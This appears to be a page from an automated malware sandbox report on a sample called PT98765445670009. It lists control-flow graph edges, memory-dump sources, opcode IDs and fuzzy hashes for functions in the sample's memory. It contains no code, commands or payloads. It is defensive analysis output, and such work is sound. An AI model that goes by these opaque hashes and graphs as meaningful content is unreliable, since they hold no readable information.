2c3b46e-2c3b471 1162->1167 1168 2c3b543-2c3b580 1163->1168 1169 2c3b538-2c3b53a 1163->1169 1164->1144 1165->1131 1170 2c3b424-2c3b43c 1165->1170 1166->1147 1179 2c3b4ad-2c3b4b3 1166->1179 1167->1126 1171 2c3b473-2c3b479 1167->1171 1175 2c3b582 1168->1175 1176 2c3b587-2c3b664 call 2c33960 call 2c33480 1168->1176 1169->1140 1169->1141 1170->1162 1180 2c3b43e-2c3b444 1170->1180 1171->1152 1171->1157 1175->1176 1192 2c3b666 1176->1192 1193 2c3b66b-2c3b68c call 2c34e20 1176->1193 1179->1131 1181 2c3b4b5-2c3b4bc 1179->1181 1180->1131 1183 2c3b44a-2c3b44e 1180->1183 1181->1137 1183->1139 1192->1193 1195 2c3b691-2c3b69c 1193->1195 1196 2c3b6a3-2c3b6a7 1195->1196 1197 2c3b69e 1195->1197 1198 2c3b6a9-2c3b6aa 1196->1198 1199 2c3b6ac-2c3b6b3 1196->1199 1197->1196 1200 2c3b6cb-2c3b70f 1198->1200 1201 2c3b6b5 1199->1201 1202 2c3b6ba-2c3b6c8 1199->1202 1206 2c3b775-2c3b78c 1200->1206 1201->1202 1202->1200 1208 2c3b711-2c3b727 1206->1208 1209 2c3b78e-2c3b7b3 1206->1209 1213 2c3b751 1208->1213 1214 2c3b729-2c3b735 1208->1214 1215 2c3b7b5-2c3b7ca 1209->1215 1216 2c3b7cb 1209->1216 1219 2c3b757-2c3b774 1213->1219 1217 2c3b737-2c3b73d 1214->1217 1218 2c3b73f-2c3b745 1214->1218 1215->1216 1222 2c3b7cc 1216->1222 1220 2c3b74f 1217->1220 1218->1220 1219->1206 1220->1219 1222->1222
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.3687789368.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2c30000_PT98765445670009.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: s
                                                  • API String ID: 0-453955339
                                                  • Opcode ID: 829e772b0cb6559912cc17ed7195ebeb928247083c0ca61496193a94093b0b3c
                                                  • Instruction ID: d839858703eb1ed322b6d25bf6391ecb3cc1f03572a748233372b3ab9670fc7d
                                                  • Opcode Fuzzy Hash: 829e772b0cb6559912cc17ed7195ebeb928247083c0ca61496193a94093b0b3c
                                                  • Instruction Fuzzy Hash: 9EF15B71E00218CFDB15DFA9C584A9DBBB1FF89314F1584A9E819AB362DB30AD42CF50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 02C398B8 Relevance: .9, Instructions: 859COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.3687789368.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2c30000_PT98765445670009.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: eebd797fd0dc9ca65c002b6f678acd4c548b7d954f1c016e1aacd3aead6b8290
                                                  • Instruction ID: da39fd3a6a5a1d2cf3d3a516d538a5060bbb8a8f6f191501c23ae86e158af9d4
                                                  • Opcode Fuzzy Hash: eebd797fd0dc9ca65c002b6f678acd4c548b7d954f1c016e1aacd3aead6b8290
                                                  • Instruction Fuzzy Hash: D9729031A00209DFCB16CF68D984AAEBBF2FF89300F158959E8499B3A5D771ED51CB50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 069D11A0 Relevance: .7, Instructions: 745COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1967 69d11a0-69d11c0 1968 69d11c7-69d1240 1967->1968 1969 69d11c2 1967->1969 1973 69d128e-69d12e1 1968->1973 1974 69d1242-69d1289 1968->1974 1969->1968 1981 69d1329-69d13dd 1973->1981 1982 69d12e3-69d1328 1973->1982 1974->1981 2129 69d13e3 call 2c34e11 1981->2129 2130 69d13e3 call 2c34e20 1981->2130 1982->1981 1992 69d13e8-69d140e 1994 69d1fcf-69d2004 1992->1994 1995 69d1414-69d1517 1992->1995 2005 69d1fc2-69d1fc8 1995->2005 2006 69d151c-69d15fa 2005->2006 2007 69d1fce 2005->2007 2015 69d15fc 2006->2015 2016 69d1601-69d166a 2006->2016 2007->1994 2015->2016 2020 69d166c 2016->2020 2021 69d1671-69d1682 2016->2021 2020->2021 2022 69d170f-69d1816 2021->2022 2023 69d1688-69d1692 2021->2023 2041 69d181d-69d1886 2022->2041 2042 69d1818 2022->2042 2024 69d1699-69d170e 2023->2024 2025 69d1694 2023->2025 2024->2022 2025->2024 2046 69d188d-69d189e 2041->2046 2047 69d1888 2041->2047 2042->2041 2048 69d192b-69d1adf 2046->2048 2049 69d18a4-69d18ae 2046->2049 2047->2046 2070 69d1ae6-69d1b64 2048->2070 2071 69d1ae1 2048->2071 2050 69d18b5-69d192a 2049->2050 2051 69d18b0 2049->2051 2050->2048 2051->2050 2075 69d1b6b-69d1b7c 2070->2075 2076 69d1b66 2070->2076 2071->2070 2077 69d1c09-69d1ca2 2075->2077 2078 69d1b82-69d1b8c 2075->2078 2076->2075 2088 69d1ca9-69d1d21 2077->2088 2089 69d1ca4 2077->2089 2079 69d1b8e 2078->2079 2080 69d1b93-69d1c08 2078->2080 2079->2080 2080->2077 2096 69d1d28-69d1d39 2088->2096 2097 69d1d23 2088->2097 2089->2088 2098 69d1d3f-69d1dd3 2096->2098 2099 69d1e27-69d1ebb 2096->2099 2097->2096 2113 69d1dda-69d1e26 2098->2113 2114 69d1dd5 2098->2114 2108 69d1fad-69d1fb8 2099->2108 2109 69d1ec1-69d1fac 2099->2109 2111 69d1fbf 2108->2111 2112 69d1fba 2108->2112 2109->2108 2111->2005 2112->2111 2113->2099 2114->2113 2129->1992 2130->1992
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.3690568724.00000000069D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_69d0000_PT98765445670009.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7403d11b77f0e41a952dadd26140915c61513f3aa66b39dbf5b75aad183b1d72
                                                  • Instruction ID: a72af756c4a544493b0374479ad331d89a6e814222b6100331c8adbf4bdfa5e9
                                                  • Opcode Fuzzy Hash: 7403d11b77f0e41a952dadd26140915c61513f3aa66b39dbf5b75aad183b1d72
                                                  • Instruction Fuzzy Hash: 08825E74E012288FDBA5DF69C998BDDBBB2BB49301F1081EA940DA7364DB315E81DF41
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 02C3EDF0 Relevance: .7, Instructions: 720COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 2131 2c3edf0-2c3ee20 2132 2c3ee22 2131->2132 2133 2c3ee27-2c3eea9 2131->2133 2132->2133 2135 2c3ef0e-2c3ef24 2133->2135 2136 2c3ef26-2c3ef70 call 2c30354 2135->2136 2137 2c3eeab-2c3eeb4 2135->2137 2146 2c3ef72-2c3efb3 call 2c30374 2136->2146 2147 2c3efdb-2c3efdc 2136->2147 2138 2c3eeb6 2137->2138 2139 2c3eebb-2c3ef04 call 2c3bc14 2137->2139 2138->2139 2148 2c3ef06 2139->2148 2149 2c3ef0b 2139->2149 2156 2c3efd5-2c3efd6 2146->2156 2157 2c3efb5-2c3efd3 2146->2157 2150 2c3efdd-2c3f07c 2147->2150 2148->2149 2149->2135 2163 2c3f082-2c3f0a3 2150->2163 2164 2c3f9ce-2c3fa03 2150->2164 2158 2c3efd7-2c3efd9 2156->2158 2157->2158 2158->2150 2167 2c3f9ab-2c3f9c7 2163->2167 2168 2c3f0a8-2c3f0b1 2167->2168 2169 2c3f9cd 2167->2169 2170 2c3f0b3 2168->2170 2171 2c3f0b8-2c3f11e call 2c3b088 2168->2171 2169->2164 2170->2171 2176 2c3f120 2171->2176 2177 2c3f125-2c3f1af call 2c3b098 2171->2177 2176->2177 2184 2c3f1c1-2c3f1c8 2177->2184 2185 2c3f1b1-2c3f1b8 2177->2185 2188 2c3f1ca 2184->2188 2189 2c3f1cf-2c3f1dc 2184->2189 2186 2c3f1ba 2185->2186 2187 2c3f1bf 2185->2187 2186->2187 2187->2189 2188->2189 2190 2c3f1e3-2c3f1ea 2189->2190 2191 2c3f1de 2189->2191 2192 2c3f1f1-2c3f248 2190->2192 2193 2c3f1ec 2190->2193 2191->2190 2196 2c3f24a 2192->2196 2197 2c3f24f-2c3f266 2192->2197 2193->2192 2196->2197 2198 2c3f271-2c3f279 2197->2198 2199 2c3f268-2c3f26f 2197->2199 2200 2c3f27a-2c3f284 2198->2200 2199->2200 2201 2c3f286 2200->2201 2202 2c3f28b-2c3f294 2200->2202 2201->2202 2203 2c3f97b-2c3f981 2202->2203 2204 2c3f987-2c3f9a1 2203->2204 2205 2c3f299-2c3f2a5 2203->2205 2213 2c3f9a3 2204->2213 2214 2c3f9a8 2204->2214 2206 2c3f2a7 2205->2206 2207 2c3f2ac-2c3f2b1 2205->2207 2206->2207 2208 2c3f2b3-2c3f2bf 2207->2208 2209 2c3f2f4-2c3f2f6 2207->2209 2211 2c3f2c1 2208->2211 2212 2c3f2c6-2c3f2cb 2208->2212 2215 2c3f2fc-2c3f310 2209->2215 2211->2212 2212->2209 2218 2c3f2cd-2c3f2da 2212->2218 2213->2214 2214->2167 2216 2c3f316-2c3f32b 2215->2216 2217 2c3f959-2c3f966 2215->2217 2219 2c3f332-2c3f3b8 2216->2219 2220 2c3f32d 2216->2220 2221 2c3f967-2c3f971 2217->2221 2222 2c3f2e1-2c3f2f2 2218->2222 2223 2c3f2dc 2218->2223 2230 2c3f3e2 2219->2230 2231 2c3f3ba-2c3f3e0 2219->2231 2220->2219 2224 2c3f973 2221->2224 2225 2c3f978 2221->2225 2222->2215 2223->2222 2224->2225 2225->2203 2232 2c3f3ec-2c3f40c 2230->2232 2231->2232 2233 2c3f412-2c3f41c 2232->2233 2234 2c3f58b-2c3f590 2232->2234 2236 2c3f423-2c3f44c 2233->2236 2237 2c3f41e 2233->2237 2238 2c3f592-2c3f5b2 2234->2238 2239 2c3f5f4-2c3f5f6 2234->2239 2240 2c3f466-2c3f468 2236->2240 2241 2c3f44e-2c3f458 2236->2241 2237->2236 2250 2c3f5b4-2c3f5da 2238->2250 2251 2c3f5dc 2238->2251 2242 2c3f5fc-2c3f61c 2239->2242 2246 2c3f507-2c3f516 2240->2246 2244 2c3f45a 2241->2244 2245 2c3f45f-2c3f465 2241->2245 2247 2c3f953-2c3f954 2242->2247 2248 2c3f622-2c3f62c 2242->2248 2244->2245 2245->2240 2252 2c3f518 2246->2252 2253 2c3f51d-2c3f522 2246->2253 2249 2c3f955-2c3f957 2247->2249 2254 2c3f633-2c3f65c 2248->2254 2255 2c3f62e 2248->2255 2249->2221 2258 2c3f5e6-2c3f5f2 2250->2258 2251->2258 2252->2253 2259 2c3f524-2c3f534 2253->2259 2260 2c3f54c-2c3f54e 2253->2260 2256 2c3f676-2c3f684 2254->2256 2257 2c3f65e-2c3f668 2254->2257 2255->2254 2264 2c3f723-2c3f732 2256->2264 2262 2c3f66a 2257->2262 2263 2c3f66f-2c3f675 2257->2263 2258->2242 2266 2c3f536 2259->2266 2267 2c3f53b-2c3f54a 2259->2267 2261 2c3f554-2c3f568 2260->2261 2268 2c3f56e-2c3f586 2261->2268 2269 2c3f46d-2c3f488 2261->2269 2262->2263 2263->2256 2270 2c3f734 2264->2270 2271 2c3f739-2c3f73e 2264->2271 2266->2267 2267->2261 2268->2249 2274 2c3f48a 2269->2274 2275 2c3f48f-2c3f4f9 2269->2275 2270->2271 2272 2c3f740-2c3f750 2271->2272 2273 2c3f768-2c3f76a 2271->2273 2276 2c3f752 2272->2276 2277 2c3f757-2c3f766 2272->2277 2278 2c3f770-2c3f784 2273->2278 2274->2275 2293 2c3f500-2c3f506 2275->2293 2294 2c3f4fb 2275->2294 2276->2277 2277->2278 2279 2c3f78a-2c3f7f3 call 2c35a28 * 2 2278->2279 2280 2c3f689-2c3f6a4 2278->2280 2291 2c3f7f5-2c3f7f7 2279->2291 2292 2c3f7fc-2c3f94f 2279->2292 2282 2c3f6a6 2280->2282 2283 2c3f6ab-2c3f715 2280->2283 2282->2283 2299 2c3f717 2283->2299 2300 2c3f71c-2c3f722 2283->2300 2296 2c3f950-2c3f951 2291->2296 2292->2296 2293->2246 2294->2293 2296->2204 2299->2300 2300->2264
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.3687789368.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2c30000_PT98765445670009.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ea454450ac447b099bb37b4949e929f45c098046257ebb0788ae1d3a99ab673a
                                                  • Instruction ID: f442b70e025190f49724e83653eb7ab8e4cf5dc4c0d029cdd9ecde4dbcbd1000
                                                  • Opcode Fuzzy Hash: ea454450ac447b099bb37b4949e929f45c098046257ebb0788ae1d3a99ab673a
                                                  • Instruction Fuzzy Hash: C772AE74E002288FDB65DF69C984BE9BBB2BF89300F1489E9D449A7355DB309E81CF50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 02C36168 Relevance: .5, Instructions: 513COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.3687789368.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2c30000_PT98765445670009.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d7dcfcee7f8ed67b7e9c0f86bb156b9de58adea7d83a3538e8f074b981d4e862
                                                  • Instruction ID: 695d50f4975a988a0171d1eb683670def54189640ea807b3a105bf8807a8ea98
                                                  • Opcode Fuzzy Hash: d7dcfcee7f8ed67b7e9c0f86bb156b9de58adea7d83a3538e8f074b981d4e862
                                                  • Instruction Fuzzy Hash: FE127C71A002199FDB15DF69C854BAEBBF6BF88300F20892DE506DB395DB349D42CB94
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 02C36790 Relevance: .4, Instructions: 444COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 3089 2c36790-2c367c6 3090 2c367ce-2c367d4 3089->3090 3213 2c367c8 call 2c36790 3089->3213 3214 2c367c8 call 2c368e0 3089->3214 3215 2c367c8 call 2c36168 3089->3215 3091 2c367d6-2c367da 3090->3091 3092 2c36824-2c36828 3090->3092 3095 2c367e9-2c367f0 3091->3095 3096 2c367dc-2c367e1 3091->3096 3093 2c3682a-2c36839 3092->3093 3094 2c3683f-2c36853 3092->3094 3097 2c36865-2c3686f 3093->3097 3098 2c3683b-2c3683d 3093->3098 3099 2c3685b-2c36862 3094->3099 3217 2c36855 call 2c398b1 3094->3217 3218 2c36855 call 2c398b8 3094->3218 3100 2c368c6-2c36903 3095->3100 3101 2c367f6-2c367fd 3095->3101 3096->3095 3102 2c36871-2c36877 3097->3102 3103 2c36879-2c3687d 3097->3103 3098->3099 3111 2c36905-2c3690b 3100->3111 3112 2c3690e-2c3692e 3100->3112 3101->3092 3104 2c367ff-2c36803 3101->3104 3107 2c36885-2c368bf 3102->3107 3103->3107 3109 2c3687f 3103->3109 3105 2c36812-2c36819 3104->3105 3106 2c36805-2c3680a 3104->3106 3105->3100 3110 2c3681f-2c36822 3105->3110 3106->3105 3107->3100 3109->3107 3110->3099 3111->3112 3118 2c36930 3112->3118 3119 2c36935-2c3693c 3112->3119 3120 2c36cc4-2c36ccd 3118->3120 3121 2c3693e-2c36949 3119->3121 3123 2c36cd5-2c36cea 3121->3123 3124 2c3694f-2c36962 3121->3124 3128 2c36964-2c36972 3124->3128 3129 2c36978-2c36993 3124->3129 3128->3129 3132 2c36c4c-2c36c53 3128->3132 3133 2c369b7-2c369ba 3129->3133 3134 2c36995-2c3699b 3129->3134 3132->3120 3139 2c36c55-2c36c57 3132->3139 3135 2c369c0-2c369c3 3133->3135 3136 2c36b14-2c36b1a 3133->3136 3137 2c369a4-2c369a7 3134->3137 3138 2c3699d 3134->3138 3135->3136 3142 2c369c9-2c369cf 3135->3142 3140 2c36b20-2c36b25 3136->3140 3141 2c36c06-2c36c09 3136->3141 3143 2c369da-2c369e0 3137->3143 3144 2c369a9-2c369ac 3137->3144 3138->3136 3138->3137 3138->3141 3138->3143 3145 2c36c66-2c36c6c 3139->3145 3146 2c36c59-2c36c5e 3139->3146 3140->3141 3149 2c36cd0 3141->3149 3150 2c36c0f-2c36c15 3141->3150 3142->3136 3148 2c369d5 3142->3148 3151 2c369e2-2c369e4 3143->3151 3152 2c369e6-2c369e8 3143->3152 3153 2c369b2 3144->3153 3154 2c36a46-2c36a4c 3144->3154 3145->3123 3147 2c36c6e-2c36c73 3145->3147 3146->3145 3155 2c36c75-2c36c7a 3147->3155 3156 2c36cb8-2c36cbb 3147->3156 3148->3141 3149->3123 3158 2c36c17-2c36c1f 3150->3158 3159 2c36c3a-2c36c3e 3150->3159 3160 2c369f2-2c369fb 3151->3160 3152->3160 3153->3141 3154->3141 3157 2c36a52-2c36a58 3154->3157 3155->3149 3161 2c36c7c 3155->3161 3156->3149 3168 2c36cbd-2c36cc2 3156->3168 3162 2c36a5a-2c36a5c 3157->3162 3163 2c36a5e-2c36a60 3157->3163 3158->3123 3164 2c36c25-2c36c34 3158->3164 3159->3132 3167 2c36c40-2c36c46 3159->3167 3165 2c36a0e-2c36a36 3160->3165 3166 2c369fd-2c36a08 3160->3166 3169 2c36c83-2c36c88 3161->3169 3170 2c36a6a-2c36a81 3162->3170 3163->3170 3164->3129 3164->3159 3188 2c36b2a-2c36b60 3165->3188 3189 2c36a3c-2c36a41 3165->3189 3166->3141 3166->3165 3167->3121 3167->3132 3168->3120 3168->3139 3171 2c36caa-2c36cac 3169->3171 3172 2c36c8a-2c36c8c 3169->3172 3182 2c36a83-2c36a9c 3170->3182 3183 2c36aac-2c36ad3 3170->3183 3171->3149 3179 2c36cae-2c36cb1 3171->3179 3176 2c36c9b-2c36ca1 3172->3176 3177 2c36c8e-2c36c93 3172->3177 3176->3123 3181 2c36ca3-2c36ca8 3176->3181 3177->3176 3179->3156 3181->3171 3184 2c36c7e-2c36c81 3181->3184 3182->3188 3192 2c36aa2-2c36aa7 3182->3192 3183->3149 3194 2c36ad9-2c36adc 3183->3194 3184->3149 3184->3169 3195 2c36b62-2c36b66 3188->3195 3196 2c36b6d-2c36b75 3188->3196 3189->3188 3192->3188 3194->3149 3197 2c36ae2-2c36b0b 3194->3197 3198 2c36b85-2c36b89 3195->3198 3199 2c36b68-2c36b6b 3195->3199 3196->3149 3200 2c36b7b-2c36b80 3196->3200 3197->3188 3212 2c36b0d-2c36b12 3197->3212 3201 2c36b8b-2c36b91 3198->3201 3202 2c36ba8-2c36bac 3198->3202 3199->3196 3199->3198 3200->3141 3201->3202 3204 2c36b93-2c36b9b 3201->3204 3205 2c36bb6-2c36bd5 call 2c36eb8 3202->3205 3206 2c36bae-2c36bb4 3202->3206 3204->3149 3207 2c36ba1-2c36ba6 3204->3207 3209 2c36bdb-2c36bdf 3205->3209 3206->3205 3206->3209 3207->3141 3209->3141 3210 2c36be1-2c36bfd 3209->3210 3210->3141 3212->3188 3213->3090 3214->3090 3215->3090 3217->3099 3218->3099
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.3687789368.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2c30000_PT98765445670009.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5722111140a04d0d028c740c29365b2699d070a23a9fdf36733531aa34d41305
                                                  • Instruction ID: 07000af263c5c54604e9e2c166fd8cbb5af6f0e62f6ab9b193779cf68f42e145
                                                  • Opcode Fuzzy Hash: 5722111140a04d0d028c740c29365b2699d070a23a9fdf36733531aa34d41305
                                                  • Instruction Fuzzy Hash: FE024E70A00219EFCB16CF69D984AADBBFAFF88304F258869E405AB261D730DD51CF54
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 069D8608 Relevance: .3, Instructions: 296COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 3863 69d8608-69d8628 3864 69d862f-69d86f1 3863->3864 3865 69d862a 3863->3865 3870 69d8aba-69d8bb8 3864->3870 3871 69d86f7-69d8714 3864->3871 3865->3864 3874 69d8bba-69d8bbf 3870->3874 3875 69d8bc0-69d8bc6 3870->3875 3922 69d8717 call 52c1506 3871->3922 3923 69d8717 call 52c11c0 3871->3923 3924 69d8717 call 52c11b1 3871->3924 3874->3875 3876 69d871c-69d8735 3925 69d8737 call 52c7f8c 3876->3925 3926 69d8737 call 52c7978 3876->3926 3927 69d8737 call 52c7988 3876->3927 3928 69d8737 call 52c7ba8 3876->3928 3878 69d873c-69d875e 3880 69d8765-69d876e 3878->3880 3881 69d8760 3878->3881 3882 69d8aad-69d8ab3 3880->3882 3881->3880 3883 69d8ab9 3882->3883 3884 69d8773-69d880b 3882->3884 3883->3870 3889 69d8811-69d884d 3884->3889 3890 69d88e3-69d8944 3884->3890 3929 69d8853 call 69d8bed 3889->3929 3930 69d8853 call 69d8ec1 3889->3930 3901 69d8945-69d899a 3890->3901 3897 69d8859-69d8894 3899 69d88de-69d88e1 3897->3899 3900 69d8896-69d88b3 3897->3900 3899->3901 3904 69d88b9-69d88dd 3900->3904 3906 69d8a91-69d8aa3 3901->3906 3907 69d89a0-69d8a90 3901->3907 3904->3899 3908 69d8aaa 3906->3908 3909 69d8aa5 3906->3909 3907->3906 3908->3882 3909->3908 3922->3876 3923->3876 3924->3876 3925->3878 3926->3878 3927->3878 3928->3878 3929->3897 3930->3897
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.3690568724.00000000069D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_69d0000_PT98765445670009.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f2ff1b95a3d64ba9665a6b58742c91c937fa7997768a43186515a1b3ac62ffe9
                                                  • Instruction ID: 960fbc22aa3f3c9e68827278240d2e750593e76c3eebdbd2cddcb9dc6b62072f
                                                  • Opcode Fuzzy Hash: f2ff1b95a3d64ba9665a6b58742c91c937fa7997768a43186515a1b3ac62ffe9
                                                  • Instruction Fuzzy Hash: 1BE1C174E01218CFEB64DFA5C944B9DBBB2BF89304F2081AAD409AB395DB755E85CF10
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 02C3FA10 Relevance: .3, Instructions: 274COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.3687789368.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2c30000_PT98765445670009.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 329089c09e8462066605aee0eb69b45723fb0b83f802c4085ffe6bd1b9b47903
                                                  • Instruction ID: f4ea3af8df941daf0b28529077151325f1c75bf6b421b6a958608b3c9a922c32
                                                  • Opcode Fuzzy Hash: 329089c09e8462066605aee0eb69b45723fb0b83f802c4085ffe6bd1b9b47903
                                                  • Instruction Fuzzy Hash: ECD1D474E00218CFDB14DFA5D944BADBBB2BF88301F1085AAD809AB355DB359E86CF10
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 052C0D60 Relevance: .3, Instructions: 268COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.3689982941.00000000052C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_52c0000_PT98765445670009.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 53ed86da23cd3857cf1eafa58023149f7be1531017ed8dbd4d3cc4f2f9bfaf2c
                                                  • Instruction ID: efe0efe3d5a6a5d608dda9810b3928aea69d3bb61b936e5d8134aba135f0c54d
                                                  • Opcode Fuzzy Hash: 53ed86da23cd3857cf1eafa58023149f7be1531017ed8dbd4d3cc4f2f9bfaf2c
                                                  • Instruction Fuzzy Hash: B2C1A274E00218CFDB14DFA9D954BADBBB2BF89301F1081AAD809AB355DB359E85CF50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 052CC8B8 Relevance: .3, Instructions: 268COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.3689982941.00000000052C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_52c0000_PT98765445670009.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d372d6b94e822a81db74ce0190d37a0061acbc9f53e2fe1ac73aecff23455fc6
                                                  • Instruction ID: aee5c43dd4c895bf15fe8bbeb97c6174f5e47fb3bc3cb01c99ddecbfdee4a9a0
                                                  • Opcode Fuzzy Hash: d372d6b94e822a81db74ce0190d37a0061acbc9f53e2fe1ac73aecff23455fc6
                                                  • Instruction Fuzzy Hash: DFC1BF74E10218CFDB14DFA5C984BADBBB2BF89301F1081AAD419AB355DB359E86CF50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 069D8BED Relevance: .2, Instructions: 223COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.3690568724.00000000069D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_69d0000_PT98765445670009.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 51ded4948a2ee334446703d0b1e501fc0150f33bae79b6dd07db0f99924ac6fc
                                                  • Instruction ID: 8620a6d6876aedf2d8a42332d0814bc04a631734224c5d13d20694c71c3d42ce
                                                  • Opcode Fuzzy Hash: 51ded4948a2ee334446703d0b1e501fc0150f33bae79b6dd07db0f99924ac6fc
                                                  • Instruction Fuzzy Hash: 8E911274E01218DFDB54DFAAC954AEDBBB2BF89300F20856AD419BB395DB305942CF90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 052C11B1 Relevance: .2, Instructions: 222COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.3689982941.00000000052C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_52c0000_PT98765445670009.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 421f5e0857de16cf50dbe7d88177345bd183f573d0b83c4241ab3cfe32239fce
                                                  • Instruction ID: 1a26f0bdca36b25cda73eb3c618b8cf6c57332effe7d8083297e75c2250b76cc
                                                  • Opcode Fuzzy Hash: 421f5e0857de16cf50dbe7d88177345bd183f573d0b83c4241ab3cfe32239fce
                                                  • Instruction Fuzzy Hash: E3A1F674D00218CFEB14DFA9C588BDDBBB1BF49304F20826AD409AB292DB759985CF55
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 052C11C0 Relevance: .2, Instructions: 220COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.3689982941.00000000052C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_52c0000_PT98765445670009.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3e6194a2e5827386d29e62c6937180e759b93716ddc6eadab4f0bfa0c0c9fc48
                                                  • Instruction ID: 2c74eaee4ab064ea57f4566702df769b5afcf378d2c8fb65e85321e0659ac0f3
                                                  • Opcode Fuzzy Hash: 3e6194a2e5827386d29e62c6937180e759b93716ddc6eadab4f0bfa0c0c9fc48
                                                  • Instruction Fuzzy Hash: E7A10674D00218CFEB24DFA9C588B9DBBB1FF48314F20826AD409A7392DB759985CF55
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 069DB6E8 Relevance: .2, Instructions: 219COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.3690568724.00000000069D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
